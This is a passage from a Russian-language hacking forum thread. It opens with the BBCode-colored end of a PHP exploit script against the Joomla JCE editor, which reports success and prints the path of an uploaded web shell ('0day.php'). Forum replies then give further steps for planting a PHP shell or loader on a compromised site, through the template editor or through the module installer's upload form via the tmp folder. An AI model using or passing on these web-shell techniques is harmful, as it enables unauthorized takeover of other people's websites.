if([/COLOR][COLOR="#0000BB"]stristr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'200 OK'[/COLOR][COLOR="#007700"]) !=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"])
{echo[/COLOR][COLOR="#DD0000"]"Exploit Faild..."[/COLOR][COLOR="#007700"];} else echo[/COLOR][COLOR="#DD0000"]"Exploit Succeeded...
http://[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#DD0000"]:[/COLOR][COLOR="#0000BB"]$port$path[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/images/stories/0day.php"[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR]
[/COLOR]
exploit использует недочет в редакторе JCE в результате чего мы можем залить шелл... подробности читайте в багдтреках!
Сообщение от sonic
сделал как написано, шелл загрузил но при переходе на него вот такое:
что делать?
Значит что то сделали не так!, как вариант еще можно через шаблоны! заходите в редактор шаблонов и встовляите свой пхп код с мини шеллом или загрузчиком, а потом вызываите его или как там у вас смекалка сооброзит... еще вариант, заходите в установку модулей и там есть форма загрузки, выбираите у себя на компе шелл загружаите... вам админка выдаст ошибку, что типо не смог установить, но как таковой сам шелл загрузится в папку tmp вот туда и оброщаемся по названию шелла!
|